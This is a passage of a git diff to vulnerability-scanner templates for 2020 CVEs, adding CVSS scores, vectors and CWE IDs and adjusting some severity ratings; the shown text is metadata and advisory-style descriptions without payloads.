b/cves/2020/CVE-2020-16846.yaml index 9cf24f5d88..372a0572b7 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -13,6 +13,11 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 495e9c38e7..f126ba25cf 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml @@ -3,13 +3,18 @@ id: CVE-2020-16952 info: name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE author: dwisiswant0 - severity: critical + severity: high description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. reference: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md tags: cve,cve2020,sharepoint,iis + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 requests: - method: GET diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index f448fae016..dc16edbe43 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -7,6 +7,11 @@ info: description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17362 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index 17c80dd210..323ddb2eba 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. tags: xss,wso2,cve2020,cve reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17453 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index bbcd6072f2..d6a5b88323 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,6 +7,11 @@ info: description: | vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17496 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index c98ea1fe16..6e0d00f86d 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. tags: cve,cve2020,rce reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index f22e184fd5..bc3ee60d1e 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17506 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 8e59416072..86ff4d8977 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -3,12 +3,17 @@ id: CVE-2020-17518 info: name: Apache Flink Upload Path Traversal author: pdteam - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 description: | Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index f1c9a162b0..5e386eed1f 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -7,6 +7,11 @@ info: description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. reference: https://github.com/B1anda0/CVE-2020-17519 tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index fbae086491..3e281da466 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,apache,rce,struts description: | Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17530 + cwe-id: CWE-917 requests: - method: GET diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index 14c505aa53..e142920541 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml @@ -3,9 +3,15 @@ id: CVE-2020-1938 info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 - severity: high + severity: critical reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 tags: cve,cve2020,apache,tomcat,lfi,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + description: "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations." network: - inputs: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 021fb3e887..acc8e77e77 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2020,apache,xss reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index 2a6dce0689..ba85b67fc6 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -4,8 +4,12 @@ info: author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 - severity: high + severity: critical tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 requests: - method: GET diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 707e6c5343..aaf9f7972d 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -2,11 +2,16 @@ id: CVE-2020-2036 info: name: Palo Alto Networks Reflected XSS author: madrobot - severity: medium + severity: high description: > A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-2036 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 7a5e9b010c..b6c161b850 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -10,6 +10,11 @@ info: - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2096 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index e85004b3b3..4b25b87e1f 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -7,6 +7,11 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 requests: - method: POST diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 69eb751280..54be67bdf5 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -6,6 +6,11 @@ info: description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 69ef50972f..24f34dd46a 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -3,9 +3,18 @@ id: CVE-2020-22840 info: name: b2evolution CMS Open redirect author: geeknik - severity: low + severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. tags: cve,cve2020,redirect,b2evolution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 requests: - method: GET diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 7430e804ef..ddd98b74b9 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -7,6 +7,11 @@ info: description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 5270160681..af1319821d 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -11,6 +11,11 @@ info: bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-23972 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml index 6723ab0df4..7b3b0a8eb0 100644 --- a/cves/2020/CVE-2020-24148.yaml +++ b/cves/2020/CVE-2020-24148.yaml @@ -9,6 +9,11 @@ info: description: | Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.10 + cve-id: CVE-2020-24148 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 13d8570a5b..20c73cd80d 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -7,6 +7,11 @@ info: description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index e5674758dd..6c887b906a 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -10,6 +10,11 @@ info: - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index ce90bb4046..8bd38792df 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,wordpress,backups # Note: Manually check content + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index c85f31a04e..7634783769 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -7,6 +7,11 @@ info: description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. tags: cve,cve2020,redirect,episerver reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/cves/2020/CVE-2020-24571.yaml +++ b/cves/2020/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 24b6fd03d9..b998f77f13 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -3,10 +3,15 @@ id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu - severity: medium + severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml index 9b973fef67..58d1536129 100644 --- a/cves/2020/CVE-2020-24949.yaml +++ b/cves/2020/CVE-2020-24949.yaml @@ -7,6 +7,10 @@ info: description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 requests: - method: GET diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml index 1789b5371c..7f8a7cfa59 100644 --- a/cves/2020/CVE-2020-25078.yaml +++ b/cves/2020/CVE-2020-25078.yaml @@ -7,6 +7,10 @@ info: description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25078 requests: diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index f2553035ef..67e680d764 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -12,6 +12,11 @@ info: # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25213 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 21cf8027b4..adcb65ac0a 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 requests: - raw: diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index a60c97dbea..5a82ebb9c1 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2020,sco,xss reference: https://www.exploit-db.com/exploits/49300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index d2352c64ac..2ee12a9f60 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -9,6 +9,11 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index c861f6b44a..348fd0ba52 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -19,6 +19,10 @@ info: reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 requests: - method: GET diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 822c9f5ef4..2ff12bd0ef 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -3,10 +3,15 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium + severity: high description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index fb40209d26..7a0433f16c 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -10,6 +10,11 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-26153 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index d3d76d844b..0ebba2ba0c 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -11,6 +11,11 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26214 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index b9efcf09b6..18174b37ea 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -9,6 +9,10 @@ info: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 requests: - raw: diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 54d281ece9..6367027877 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/btnz-k/emby_ssrf description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml index cc00677a99..800de254e4 100644 --- a/cves/2020/CVE-2020-27361.yaml +++ b/cves/2020/CVE-2020-27361.yaml @@ -7,6 +7,11 @@ info: description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: 